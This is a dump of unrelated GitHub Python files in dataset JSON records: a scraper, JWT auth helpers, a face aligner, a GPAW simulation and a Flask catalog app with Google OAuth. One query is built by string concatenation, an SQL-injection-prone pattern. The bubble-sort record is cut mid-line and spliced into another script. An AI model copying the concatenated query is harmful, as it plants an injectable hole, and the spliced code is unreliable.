print(res)\r\n","repo_name":"JanaRubiano/Repo-10","sub_path":"point3.py","file_name":"point3.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73870082707","text":"from handle_data.connect_database import *\nfrom handle_data.get_data import *\nimport urllib.parse\n\ndef dropdown_suggestions(query):\n conn, cur = open_db()\n cur.execute(\"SELECT username, nickname FROM users WHERE username LIKE ? OR nickname LIKE ?\", ('%' + query + '%', '%' + query + '%'))\n rows = cur.fetchall()\n results = [{'username': row[0], 'nickname': row[1]} for row in rows]\n close_db()\n return results\n\ndef get_user_id(query):\n decoded_query = urllib.parse.unquote(query)\n if \"|\" in decoded_query:\n name = decoded_query.split('|')[0].strip().lower()\n else:\n name = decoded_query.strip().lower()\n conn, cur = open_db()\n cur.execute(\"SELECT id FROM users WHERE LOWER(username) = ? OR LOWER(nickname) = ?\", ((name, name)))\n user_id = cur.fetchone()\n print(user_id)\n if(user_id):\n user_id = user_id[0]\n return user_id\n close_db()\n return name\n\ndef get_user_data(id):\n sql = \"WHERE author_id = \" + str(id)\n conn, cur = open_db()\n user_data, formatted_date = user_info(cur, id)\n data = {\n \"picture\": user_data[0],\n \"username\": user_data[1],\n \"nickname\": user_data[2],\n \"date\": formatted_date,\n \"gesendete_nachrichten_text\": messages_count(cur, user=sql),\n \"nachrichten_pro_tag_text\": messages_average(cur, user=sql),\n \"aktivität_nach_wochentage_chart\": messages_per_weekday(cur, user=sql),\n \"aktivität_nach_stunden_chart\": messages_per_one_day(cur, user=sql),\n \"channel_rangliste_chart\": channel_leaderboard(cur, user=sql),\n \"spieler_rangliste_platzierung\": user_rank(cur, id),\n }\n close_db()\n return data","repo_name":"Herundur/banura_statistics_v2","sub_path":"webserver/handle_data/get_user.py","file_name":"get_user.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20014983760","text":"from bs4 import BeautifulSoup\nfrom Opener import opener\nimport requests\nimport json\n\nname = 'sz'\n\n\ndef get_opener():\n url = 'https://www.sueddeutsche.de/'\n headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36'}\n\n # get link to opener\n response = requests.get(url, headers)\n soup = BeautifulSoup(response.text, features=\"html.parser\")\n opener_link = soup.find(\"main\").find('a')['href']\n\n # get data on opener\n response = requests.get(opener_link, headers)\n soup = BeautifulSoup(response.text, features=\"html.parser\")\n\n # headline, keywords and authors are in meta tags\n headline = soup.find(\"meta\", {\"property\": \"og:title\"})['content']\n keywords = soup.find(\"meta\", {\"name\": \"keywords\"})['content'].split(',')\n authors = soup.find_all(\"meta\", {\"name\":\"author\"})\n authors = [a['content'] for a in authors]\n\n # ressort is in java script\n data = soup.find(\"script\", {\"type\":\"text/javascript\"})\n data = str(data).split('[')[1].split(']')[0]\n data = json.loads(data)\n ressort = data.get(\"ressort\")\n sub_ressort = data.get(\"thema\")\n\n # initialise opener\n op = opener(headline, opener_link, authors, ressort, sub_ressort, keywords, name)\n return op\n\n","repo_name":"henrythier/news","sub_path":"outlets/sz.py","file_name":"sz.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"74172037584","text":"#coding=utf-8\n#author:Kingving time:2020/7/27 1:01\n\n'''把数组[0,1,1,0,1,1,0,1,1,1,0,0]中所有的1排到左侧,0排到有右侧;'''\n\na=[0,1,1,0,1,1,0,1,1,1,0,0]\ns=range(len(a))[::-1]\nfor i in s:\n for j in range(i):\n if a[j] %s degree\" % (round(theta, 2)))\nprint(\"Execution time ---> %s milliseconds\\n\" % time)\n","repo_name":"muneebsaddal/document-distance-algorithm","sub_path":"DocumentDistance.py","file_name":"DocumentDistance.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"20563407655","text":"from datetime import datetime, timedelta\nfrom functools import wraps\nfrom hashlib import sha256\nfrom uuid import uuid4\n\nimport jwt\nfrom config import app\nfrom flask import abort, g, make_response\nfrom flask_jwt_extended import get_jwt, verify_jwt_in_request\nfrom flask_jwt_extended.exceptions import NoAuthorizationError\nfrom jwt import DecodeError, ExpiredSignatureError, InvalidSignatureError\nfrom model.users import User\n\n\ndef gen_jwts(user: User, with_refresh:bool=True):\n \"\"\"\n Generates a new JWT access and refresh token for a given user\n\n Args:\n user (User):\n The user the tokens should be generated for\n \n with_refresh (bool):\n True if the refresh token should be generated with the access token. False if not.\n\n Returns:\n Response(partial) -> Response containing the tokens\n \"\"\"\n\n ctime = datetime.utcnow()\n\n # create fingerprint cookie contents\n fingerprint = str(uuid4())\n\n # create refresh token\n rtoken = jwt.encode({\n 'sub': user.id,\n 'jti': uuid4().hex,\n 'type': 'refresh',\n # hash fingerprint\n 'fingerprint': sha256(fingerprint.encode('utf-8')).hexdigest(),\n 'iat': ctime,\n 'exp': ctime + timedelta(**app.config.get('JWT_REFRESH_LIFESPAN')),\n }, app.config.get('SECRET_KEY'), algorithm=\"HS256\")\n\n # create access token\n atoken = jwt.encode({\n 'sub': user.id,\n 'type': 'access',\n 'iat': ctime,\n 'exp': ctime + timedelta(**app.config.get('JWT_ACCESS_LIFESPAN')),\n }, app.config.get('SECRET_KEY'), algorithm=\"HS256\")\n\n body = {'access_token': atoken, 'message': 'Success'}\n \n if with_refresh:\n body.update({'refresh_token': rtoken})\n \n res = make_response(body)\n\n # set fingerprint cookie\n res.set_cookie('FuelGuru_Secure_Fgp', fingerprint,\n max_age=timedelta(**app.config.get('JWT_REFRESH_LIFESPAN')),\n expires=(\n ctime + timedelta(**app.config.get('JWT_REFRESH_LIFESPAN'))),\n httponly=True,\n secure=not app.config.get('IS_DEV'),\n samesite='Strict')\n\n return res\n\n\ndef _verify_token(is_admin=False):\n try:\n # get JWT from request\n verify_jwt_in_request()\n\n data = get_jwt()\n\n # get user from JWT\n current_user: User = User.query.get(data.get('sub'))\n\n # dont authenticate if the token doesnt correspond to a real user\n if not current_user:\n abort(make_response({\"error\": \"Token is invalid\"}, 401))\n\n # dont authenticate if the corresponding user has been deleted\n if current_user.deleted_at:\n abort(make_response({\"error\": \"This user has been deleted\"}, 401))\n\n # dont authenticate if the route requires admin privledges\n # but the user does not have admin\n if is_admin:\n if current_user.user_type.is_admin != True:\n abort(make_response(\n {'error': 'The user is not authorized to make this request'}, 403))\n\n except NoAuthorizationError as e:\n abort(make_response({'error': str(e)}, 401))\n\n except InvalidSignatureError:\n abort(make_response({\"error\": 'Token is invalid'}, 401))\n\n except ExpiredSignatureError:\n abort(make_response({\"error\": 'Token is expired'}, 401))\n\n except DecodeError:\n return abort(make_response(\n {'error': 'Token signature is invalid'}, 401))\n\n g.current_user = current_user\n\n\ndef token_required(f):\n \"\"\"\n Wraps a functions and makes it token required\n\n Args:\n f (function): The function to wrap\n Returns:\n function -> The decorator function\n \"\"\"\n\n @wraps(f)\n def decorated(*args, **kwargs):\n _verify_token()\n return f(*args, **kwargs)\n\n return decorated\n\n\ndef admin_required(f):\n \"\"\"\n Wraps a functions and makes it admin required\n\n Args:\n f (function): The function to wrap\n Returns:\n function -> The decorator function\n \"\"\"\n\n @wraps(f)\n def decorated(*args, **kwargs):\n _verify_token(True)\n return f(*args, **kwargs)\n\n return decorated\n","repo_name":"SWEN3920-CAPSTONE/Fuel-Guru","sub_path":"controller/routes/token.py","file_name":"token.py","file_ext":"py","file_size_in_byte":4210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8571274528","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport hashlib\nimport json\nimport os\nimport pickle\nimport shutil\n\nimport cv2\nimport numpy as np\nfrom ml_serving.drivers import driver\n\nfrom app.recognize import defaults\nfrom app.tools import bg_remove\nfrom app.tools import images\nfrom app.tools import downloader\nfrom app.tools import dataset\nfrom app.tools import utils\n\n\nDEFAULT_INPUT_DIR = \"./data/faces\"\n\n\nclass Aligner:\n def __init__(\n self,\n input_dir=DEFAULT_INPUT_DIR,\n clarified=False,\n clear_input_dir=False,\n download=None,\n aligned_dir=defaults.ALIGNED_DIR,\n complementary_align=False,\n min_face_size=defaults.MIN_FACE_SIZE,\n image_size=defaults.IMAGE_SIZE,\n margin=defaults.IMAGE_MARGIN,\n face_detection_path=defaults.FACE_DETECTION_PATH,\n bg_remove_path=None,\n device=defaults.DEVICE,\n ):\n self.input_dir = input_dir\n self.clarified = clarified\n self.aligned_dir = aligned_dir\n self.complementary_align = complementary_align or clarified\n self.min_face_size = min_face_size\n self.image_size = image_size\n self.margin = margin\n self.face_detection_path = face_detection_path\n self.bg_remove_path = None if clarified else bg_remove_path\n self.device = device\n if clear_input_dir:\n shutil.rmtree(self.input_dir, ignore_errors=True)\n if download is not None:\n err = downloader.Downloader(download, destination=self.input_dir).extract()\n if err is not None:\n raise RuntimeError(err)\n self.serving: driver.ServingDriver = None\n self.threshold = 0.5\n self.min_face_area = self.min_face_size ** 2\n\n def align(self, images_limit=None):\n\n if self.complementary_align:\n utils.print_fun('Complementary align %simages to %s' % (\"clarified \" if self.clarified else \"\", self.aligned_dir))\n else:\n utils.print_fun('Align images to %s' % self.aligned_dir)\n\n aligned_dir = os.path.expanduser(self.aligned_dir)\n bounding_boxes_filename = os.path.join(aligned_dir, 'bounding_boxes.txt')\n align_filename = os.path.join(aligned_dir, 'align.pkl')\n\n align_data_args = {\n \"min_face_size\": self.min_face_size,\n \"image_size\": self.image_size,\n \"margin\": self.margin,\n # used for dataset alignment and do not used for clarified alignment\n # \"bg_remove_path\": self.bg_remove_path,\n }\n\n align_data = {}\n if os.path.isfile(align_filename):\n utils.print_fun(\"Check previous align data\")\n with open(align_filename, 'rb') as infile:\n (align_data_args_loaded, align_data_loaded) = pickle.load(infile)\n if align_data_args == align_data_args_loaded:\n utils.print_fun(\"Loaded data about %d aligned classes\" % len(align_data_loaded))\n align_data = align_data_loaded\n else:\n utils.print_fun(\"Previous align data is for another arguments, deleting existing data\")\n shutil.rmtree(aligned_dir, ignore_errors=True)\n\n if not os.path.isdir(aligned_dir):\n utils.print_fun(\"Creating output dir\")\n os.makedirs(aligned_dir)\n\n # Store some git revision info in a text file in the log directory\n src_path, _ = os.path.split(os.path.realpath(__file__))\n # facenet.store_revision_info(src_path, output_dir, ' '.join(sys.argv))\n loaded_dataset = dataset.get_dataset(self.input_dir)\n loaded_dataset_meta = dataset.get_meta(loaded_dataset)\n\n utils.print_fun('Creating networks and loading parameters')\n\n # Load driver\n self._load_driver()\n\n bg_rm_drv = bg_remove.get_driver(self.bg_remove_path)\n\n bounding_boxes_contents = \"\"\n\n # clear not actual previous aligned stored data\n if not self.complementary_align and len(align_data) > 0:\n stored_classes = []\n for cls in loaded_dataset:\n stored_classes.append(cls.name)\n for adcl in list(align_data):\n if adcl not in stored_classes:\n del align_data[adcl]\n\n nrof_images_total = 0\n nrof_images_skipped = 0\n nrof_images_cached = 0\n nrof_successfully_aligned = 0\n nrof_has_meta = 0\n for cls in loaded_dataset:\n output_class_dir = os.path.join(aligned_dir, cls.name)\n output_class_dir_created = False\n # meta_file = None\n aligned_class_images = []\n if cls.name in align_data:\n align_data_class = align_data[cls.name]\n else:\n align_data_class = {}\n for image_path in cls.image_paths:\n # if os.path.basename(image_path) == dataset.META_FILENAME:\n # meta_file = image_path\n # continue\n nrof_images_total += 1\n nrof_images_skipped += 1\n filename = os.path.splitext(os.path.split(image_path)[1])[0]\n output_filename = os.path.join(output_class_dir, filename + '.png')\n if not os.path.exists(output_filename):\n try:\n img = cv2.imread(image_path, cv2.IMREAD_COLOR).astype(np.float32)\n except Exception as e:\n error_message = '{}: {}'.format(image_path, e)\n utils.print_fun('ERROR: %s' % error_message)\n continue\n\n img_hash = hashlib.sha1(img.tostring()).hexdigest()\n if image_path in align_data_class:\n if 'hash' in align_data_class[image_path]:\n if align_data_class[image_path]['hash'] == img_hash:\n all_aligned_exists = True\n if 'aligned' in align_data_class[image_path]:\n for a in align_data_class[image_path]['aligned']:\n if not os.path.isfile(a):\n all_aligned_exists = False\n break\n if all_aligned_exists:\n if 'aligned' in align_data_class[image_path]:\n aligned_class_images.extend(\n list(align_data_class[image_path]['aligned'].keys()))\n for _, a in enumerate(align_data_class[image_path]['aligned']):\n b = align_data_class[image_path]['aligned'][a]\n bounding_boxes_contents += \\\n '%s %d %d %d %d cached\\n' % (a, b[0], b[1], b[2], b[3])\n nrof_images_skipped -= 1\n else:\n bounding_boxes_contents += \\\n '%s ERROR no aligned cached\\n' % image_path\n\n nrof_images_cached += 1\n continue\n\n align_data_class[image_path] = {'hash': hashlib.sha1(img.tostring()).hexdigest()}\n utils.print_fun(image_path)\n\n if len(img.shape) <= 2:\n utils.print_fun('WARNING: Unable to align \"%s\", shape %s' % (image_path, img.shape))\n bounding_boxes_contents += '%s ERROR invalid shape\\n' % image_path\n continue\n\n if self.clarified:\n\n # get clarified image as is and make one with aligned size\n bounding_boxes = np.stack([[0, 0, img.shape[1], img.shape[0]]])\n face_crop_margin = 0\n\n else:\n\n # detect faces previously with bg_remove if set, if not found, try to detect w/o bg_remove\n if bg_rm_drv is not None:\n img = bg_rm_drv.apply_mask(img)\n\n bounding_boxes = None\n if bg_rm_drv is not None:\n img_masked = bg_rm_drv.apply_mask(img)\n bounding_boxes = self._get_boxes(image_path, img_masked)\n if bounding_boxes is None:\n utils.print_fun('WARNING: no faces on image with removed bg, trying without bg removing')\n\n if bounding_boxes is None or bg_rm_drv is not None:\n bounding_boxes = self._get_boxes(image_path, img)\n\n if bounding_boxes is None:\n bounding_boxes_contents += '%s ERROR no faces detected\\n' % image_path\n continue\n\n face_crop_margin = self.margin\n\n imgs = images.get_images(\n img,\n bounding_boxes,\n face_crop_size=self.image_size,\n face_crop_margin=face_crop_margin,\n normalization=None,\n )\n\n align_data_class[image_path]['aligned'] = {}\n for i, cropped in enumerate(imgs):\n nrof_successfully_aligned += 1\n bb = bounding_boxes[i]\n filename_base, file_extension = os.path.splitext(output_filename)\n output_filename_n = \"{}_{}{}\".format(filename_base, i, file_extension)\n bounding_boxes_contents += '%s %d %d %d %d\\n' % (output_filename_n, bb[0], bb[1], bb[2], bb[3])\n if not output_class_dir_created:\n output_class_dir_created = True\n if not os.path.exists(output_class_dir):\n os.makedirs(output_class_dir)\n cv2.imwrite(output_filename_n, cropped)\n align_data_class[image_path]['aligned'][output_filename_n] = (bb[0], bb[1], bb[2], bb[3])\n\n if images_limit and nrof_successfully_aligned >= images_limit:\n break\n\n aligned_class_images.extend(list(align_data_class[image_path]['aligned'].keys()))\n\n nrof_images_skipped -= 1\n\n if images_limit and nrof_successfully_aligned >= images_limit:\n break\n\n if os.path.isdir(output_class_dir):\n cls_ = cls.name.replace(' ', '_')\n if cls_ in loaded_dataset_meta:\n with open(os.path.join(output_class_dir, dataset.META_FILENAME), 'w') as mf:\n json.dump(loaded_dataset_meta[cls_], mf)\n\n # clear not existing in input already exists aligned class images\n if not self.complementary_align:\n if os.path.isdir(output_class_dir):\n for f in os.listdir(output_class_dir):\n if f == dataset.META_FILENAME:\n continue\n fp = os.path.join(output_class_dir, f)\n if os.path.isfile(fp) and fp not in aligned_class_images:\n os.remove(fp)\n\n align_data[cls.name] = align_data_class\n\n if images_limit and images_limit <= nrof_successfully_aligned:\n utils.print_fun(\"Limit for aligned images %d is reached\" % images_limit)\n break\n\n dataset.get_meta(loaded_dataset)\n\n # clear not existing in input already exists aligned classes (dirs)\n if not self.complementary_align:\n for d in os.listdir(aligned_dir):\n dd = os.path.join(aligned_dir, d)\n if os.path.isdir(dd) and d not in align_data:\n shutil.rmtree(dd, ignore_errors=True)\n\n with open(bounding_boxes_filename, \"w\") as text_file:\n text_file.write(bounding_boxes_contents)\n\n with open(align_filename, 'wb') as align_file:\n pickle.dump((align_data_args, align_data), align_file, protocol=2)\n\n utils.print_fun('Total number of images: %d' % nrof_images_total)\n if nrof_images_cached > 0:\n utils.print_fun('Number of cached images: %d' % nrof_images_cached)\n if nrof_images_skipped > 0:\n utils.print_fun('Number of skipped images: %d' % nrof_images_skipped)\n if nrof_has_meta > 0:\n utils.print_fun('Number of classes with meta: %d' % nrof_has_meta)\n utils.print_fun('Number of successfully aligned images: %d' % nrof_successfully_aligned)\n\n def _load_driver(self):\n if self.serving is None:\n driver_name = 'openvino'\n if '_edgetpu' in self.face_detection_path and '.tflite' in self.face_detection_path:\n driver_name = 'edgetpu'\n drv = driver.load_driver(driver_name)\n # Instantinate driver\n self.serving = drv()\n self.serving.load_model(\n self.face_detection_path,\n # device=self.device,\n flexible_batch_size=True,\n )\n self.input_name = list(self.serving.inputs.keys())[0]\n if driver_name == 'openvino':\n self.input_size = tuple(list(self.serving.inputs.values())[0][:-3:-1])\n else:\n self.input_size = tuple(list(self.serving.inputs.values())[0][-2:-4:-1])\n self.output_name = list(self.serving.outputs.keys())[0]\n\n def _get_boxes(self, image_path, img):\n serving_img = cv2.resize(img, self.input_size, interpolation=cv2.INTER_AREA)\n\n if self.serving.driver_name == 'openvino':\n serving_img = np.transpose(serving_img, [2, 0, 1]).reshape([1, 3, *self.input_size[::-1]])\n else:\n serving_img = serving_img.reshape([1, *self.input_size[::-1], 3]).astype(np.uint8)\n\n raw = self.serving.predict({self.input_name: serving_img})\n\n if self.serving.driver_name == 'edgetpu':\n output = raw\n score = output[2]\n bboxes_raw = output[0].reshape([-1, 4])\n bboxes_raw = bboxes_raw[score > self.threshold]\n bounding_boxes = np.zeros_like(bboxes_raw)\n\n # y1, x1, y2, x2 -> x1, y1, x2, y2\n bounding_boxes[:, 0] = bboxes_raw[:, 1] * img.shape[1]\n bounding_boxes[:, 1] = bboxes_raw[:, 0] * img.shape[0]\n bounding_boxes[:, 2] = bboxes_raw[:, 3] * img.shape[1]\n bounding_boxes[:, 3] = bboxes_raw[:, 2] * img.shape[0]\n else:\n # 7 values:\n # class_id, label, confidence, x_min, y_min, x_max, y_max\n # Select boxes where confidence > factor\n raw = raw[self.output_name].reshape([-1, 7])\n\n bboxes_raw = raw[raw[:, 2] > self.threshold]\n bboxes_raw[:, 3] = bboxes_raw[:, 3] * img.shape[1]\n bboxes_raw[:, 5] = bboxes_raw[:, 5] * img.shape[1]\n bboxes_raw[:, 4] = bboxes_raw[:, 4] * img.shape[0]\n bboxes_raw[:, 6] = bboxes_raw[:, 6] * img.shape[0]\n\n bounding_boxes = np.zeros([len(bboxes_raw), 5])\n\n bounding_boxes[:, 0:4] = bboxes_raw[:, 3:7]\n bounding_boxes[:, 4] = bboxes_raw[:, 2]\n\n # output = output.reshape(-1, 7)\n # bboxes_raw = output[output[:, 2] > self.threshold]\n # Extract 4 values\n # bounding_boxes = bboxes_raw[:, 3:7]\n\n # Get the biggest box: find the box with largest square:\n # (y1 - y0) * (x1 - x0) - size of box.\n bbs = bounding_boxes\n area = (bbs[:, 3] - bbs[:, 1]) * (bbs[:, 2] - bbs[:, 0])\n\n if len(area) < 1:\n utils.print_fun('WARNING: Unable to align \"%s\", n_faces=%s' % (image_path, len(area)))\n return None\n\n num = np.argmax(area)\n if area[num] < self.min_face_area:\n utils.print_fun(\n 'WARNING: Unable to align \"{}\", face found but too small - about {}px '\n 'width against required minimum of {}px. Try adjust parameter --min-face-size'.format(\n image_path, int(np.sqrt(area[num])), self.min_face_size\n )\n )\n return None\n\n bounding_boxes = np.stack([bbs[num]])\n return bounding_boxes\n\n","repo_name":"kibernetika-ai/ponchik","sub_path":"app/dataset/aligner.py","file_name":"aligner.py","file_ext":"py","file_size_in_byte":16778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44075317681","text":"from ase import Atoms\nfrom gpaw import GPAW\nfrom gpaw.fdtd.poisson_fdtd import FDTDPoissonSolver\nfrom gpaw.fdtd.polarizable_material import (PermittivityPlus,\n PolarizableMaterial,\n PolarizableSphere)\nfrom gpaw.tddft import TDDFT, photoabsorption_spectrum\nfrom gpaw.inducedfield.inducedfield_tddft import TDDFTInducedField\nfrom gpaw.inducedfield.inducedfield_fdtd import FDTDInducedField\nfrom gpaw.mpi import world\nimport numpy as np\n\n# Nanosphere radius (Angstroms)\nradius = 7.40\n\n# Geometry\natom_center = np.array([30., 15., 15.])\nsphere_center = np.array([15., 15., 15.])\nsimulation_cell = np.array([40., 30., 30.])\n\n# Atoms object\natoms = Atoms('Na2', atom_center + np.array([[-1.5, 0.0, 0.0],\n [1.5, 0.0, 0.0]]))\n\n# Permittivity of Gold\n# J. Chem. Phys. 135, 084121 (2011); http://dx.doi.org/10.1063/1.3626549\neps_gold = PermittivityPlus(data=[[0.2350, 0.1551, 95.62],\n [0.4411, 0.1480, -12.55],\n [0.7603, 1.946, -40.89],\n [1.161, 1.396, 17.22],\n [2.946, 1.183, 15.76],\n [4.161, 1.964, 36.63],\n [5.747, 1.958, 22.55],\n [7.912, 1.361, 81.04]])\n\n# 3) Nanosphere + Na2\nclassical_material = PolarizableMaterial()\nclassical_material.add_component(PolarizableSphere(center=sphere_center,\n radius=radius,\n permittivity=eps_gold))\n\n# Combined Poisson solver\npoissonsolver = FDTDPoissonSolver(classical_material=classical_material,\n qm_spacing=0.5,\n cl_spacing=2.0,\n cell=simulation_cell,\n communicator=world,\n remove_moments=(1, 1))\npoissonsolver.set_calculation_mode('iterate')\n\n# Combined system\natoms.set_cell(simulation_cell)\natoms, qm_spacing, gpts = poissonsolver.cut_cell(atoms, vacuum=4.0)\n\n# Initialize GPAW\ngs_calc = GPAW(gpts=gpts,\n nbands=-1,\n poissonsolver=poissonsolver)\natoms.set_calculator(gs_calc)\n\n# Ground state\nenergy = atoms.get_potential_energy()\n\n# Save state\ngs_calc.write('gs.gpw', 'all')\n\n# Initialize TDDFT and FDTD\nkick = [0.001, 0.000, 0.000]\ntime_step = 10\niterations = 1500\n\ntd_calc = TDDFT('gs.gpw')\ntd_calc.absorption_kick(kick_strength=kick)\ntd_calc.hamiltonian.poisson.set_kick(kick)\n\n# Attach InducedFields to the calculation\nfrequencies = [2.05, 2.60]\nwidth = 0.15\ncl_ind = FDTDInducedField(paw=td_calc,\n frequencies=frequencies,\n width=width)\nqm_ind = TDDFTInducedField(paw=td_calc,\n frequencies=frequencies,\n width=width)\n\n# Propagate TDDFT and FDTD\ntd_calc.propagate(time_step, iterations, 'dm.dat', 'td.gpw')\n\n# Save results\ntd_calc.write('td.gpw', 'all')\ncl_ind.write('cl.ind')\nqm_ind.write('qm.ind')\n\nphotoabsorption_spectrum('dm.dat', 'spec.3.dat', width=width)\n","repo_name":"ray38/gpawDFT","sub_path":"doc/documentation/electrodynamics/gold+na2_nanosphere_inducedfield.py","file_name":"gold+na2_nanosphere_inducedfield.py","file_ext":"py","file_size_in_byte":3259,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"13453161914","text":"#!/usr/bin/env python\n\"\"\"Python code for itemcatalog application.\"\"\"\n\nfrom flask import Flask, render_template, request\nfrom flask import redirect, jsonify, url_for, flash, make_response\nfrom sqlalchemy import create_engine\nfrom sqlalchemy import desc, asc\nfrom sqlalchemy.orm import sessionmaker\nfrom database_setup import Base, User, Catalog, CatalogItem\nfrom flask import session as login_session\nfrom oauth2client.client import flow_from_clientsecrets\nfrom oauth2client.client import FlowExchangeError\nimport httplib2\nimport json\nimport random\nimport string\nimport requests\n\napp = Flask(__name__)\n\nCLIENT_ID = json.loads(\n open('client_secrets.json', 'r').read())['web']['client_id']\nAPPLICATION_NAME = \"Item Catalog App\"\n\n# Create database session\nengine = create_engine('sqlite:///itemcatalog.db')\nBase.metadata.bind = engine\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\n\n# Create anti-forgery state token\n@app.route('/login')\ndef showLogin():\n state = ''.join(\n random.choice(string.ascii_uppercase + string.digits)\n for x in range(32))\n login_session['state'] = state\n # return \"The current session state is %s\" % login_session['state']\n return render_template('login.html', STATE=state)\n\n\n@app.route('/gconnect', methods=['POST'])\ndef gconnect():\n # Validate state token\n if request.args.get('state') != login_session['state']:\n response = make_response(json.dumps('Invalid state parameter.'), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n # Obtain authorization code\n code = request.data\n\n try:\n # Upgrade the authorization code into a credentials object\n oauth_flow = flow_from_clientsecrets('client_secrets.json', scope='')\n oauth_flow.redirect_uri = 'postmessage'\n credentials = oauth_flow.step2_exchange(code)\n except FlowExchangeError:\n response = make_response(\n json.dumps('Failed to upgrade the authorization code.'), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Check that the access token is valid.\n access_token = credentials.access_token\n url = ('https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=%s'\n % access_token)\n\n h = httplib2.Http()\n response = h.request(url, 'GET')[1]\n str_response = response.decode('utf-8')\n result = json.loads(str_response)\n\n # If there was an error in the access token info, abort.\n if result.get('error') is not None:\n response = make_response(json.dumps(result.get('error')), 500)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Verify that the access token is used for the intended user.\n gplus_id = credentials.id_token['sub']\n if result['user_id'] != gplus_id:\n response = make_response(\n json.dumps(\"Token's user ID doesn't match given user ID.\"), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Verify that the access token is valid for this app.\n if result['issued_to'] != CLIENT_ID:\n response = make_response(\n json.dumps(\"Token's client ID does not match app's.\"), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n stored_access_token = login_session.get('access_token')\n stored_gplus_id = login_session.get('gplus_id')\n if stored_access_token is not None and gplus_id == stored_gplus_id:\n response = make_response(json.dumps(\n 'Current user is already connected.'),200)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Store the access token in the session for later use.\n login_session['access_token'] = access_token\n login_session['gplus_id'] = gplus_id\n\n # Get user info\n userinfo_url = \"https://www.googleapis.com/oauth2/v1/userinfo\"\n params = {'access_token': access_token, 'alt': 'json'}\n answer = requests.get(userinfo_url, params=params)\n\n data = answer.json()\n\n login_session['username'] = data['name']\n login_session['picture'] = data['picture']\n login_session['email'] = data['email']\n login_session['provider'] = 'google'\n\n # see if user exists, if it doesn't make a new one\n user_id = getUserID(login_session[\"email\"])\n if not user_id:\n user_id = createUser(login_session)\n login_session['user_id'] = user_id\n\n output = ''\n output += '

Welcome, '\n output += login_session['username']\n output += '!

'\n output += '/')\ndef showItems(catalog_id):\n \"\"\"Displays catalog items by rendering items.html.\"\"\"\n\n catalog = session.query(Catalog).filter_by(id=catalog_id).one()\n catalogs = session.query(Catalog).all()\n items = session.query(CatalogItem).filter_by(catalog_id=catalog_id).all()\n if 'username' not in login_session:\n return render_template('publicitems.html', items=items,\n catalog=catalog, catalogs=catalogs)\n else:\n return render_template('items.html', items=items,\n catalog=catalog, catalogs=catalogs)\n\n\n\n@app.route('///')\ndef showDescription(catalog_id, item_id):\n \"\"\"Displays item description by rendering description.html.\"\"\"\n\n catalogs = session.query(Catalog).all()\n catalog = session.query(Catalog).filter_by(id=catalog_id).one()\n item = session.query(CatalogItem).filter_by(id=item_id).all()\n creator = session.query(CatalogItem).filter_by(id=item_id).one()\n if 'username' not in login_session or creator.user_id != login_session['user_id']:\n return render_template('publicdescription.html', catalog=catalog,\n item=item, catalogs=catalogs)\n else:\n return render_template('description.html', catalog=catalog,\n item=item, catalogs=catalogs)\n\n\n@app.route('//add', methods=['GET', 'POST'])\ndef addItem(catalog_id):\n \"\"\"adds news items in the catalog.\"\"\"\n\n if 'username' not in login_session:\n return redirect('/login')\n catalog = session.query(Catalog).filter_by(id=catalog_id).one()\n if request.method == 'POST':\n if request.form['name'] == '':\n return redirect(url_for('showItems', catalog_id=catalog_id))\n else:\n addItem = CatalogItem(item_name=request.form['name'],\n description=request.form['description'], catalog_id=catalog_id,\n user_id=login_session['user_id'])\n session.add(addItem)\n session.commit()\n flash('New %s Item Successfully Added' % (addItem.item_name))\n return redirect(url_for('showItems', catalog_id=catalog_id))\n else:\n return render_template('additem.html', catalog_id=catalog_id)\n\n\n@app.route('///edit', methods=['GET', 'POST'])\ndef editItem(catalog_id, item_id):\n \"\"\"edits items in a catalog.\"\"\"\n\n if 'username' not in login_session:\n return redirect('/login')\n catalog = session.query(Catalog).filter_by(id=catalog_id).one()\n editItem = session.query(CatalogItem).filter_by(id=item_id).one()\n if login_session['user_id'] != editItem.user_id:\n return \"\"\n\n if request.method == 'POST':\n if request.form['description']:\n editItem.description = request.form['description']\n if request.form['name']:\n editItem.item_name = request.form['name']\n session.add(editItem)\n session.commit()\n flash('Item successfully edited')\n return redirect(url_for('showItems', catalog_id=catalog_id))\n else:\n return render_template('edititem.html', catalog_id=catalog_id,\n item=editItem)\n\n\n@app.route('///delete', methods=['GET', 'POST'])\ndef deleteItem(catalog_id, item_id):\n \"\"\"delete item in a catalog.\"\"\"\n\n if 'username' not in login_session:\n return redirect('/login')\n catalog = session.query(Catalog).filter_by(id=catalog_id).one()\n deleteItem = session.query(CatalogItem).filter_by(id=item_id).one()\n if login_session['user_id'] != deleteItem.user_id:\n return \"\"\n\n if request.method == 'POST':\n session.delete(deleteItem)\n session.commit()\n return redirect(url_for('showItems', catalog_id=catalog_id))\n else:\n return render_template('deleteitem.html', catalog_id=catalog_id,\n item=deleteItem)\n\n# JSON APIs to provide catalog and items data\n\n\n@app.route('/catalog/JSON')\ndef showCatalogJSON():\n \"\"\"provides catalog data in JSON format.\"\"\"\n\n catalog = session.query(Catalog).all()\n return 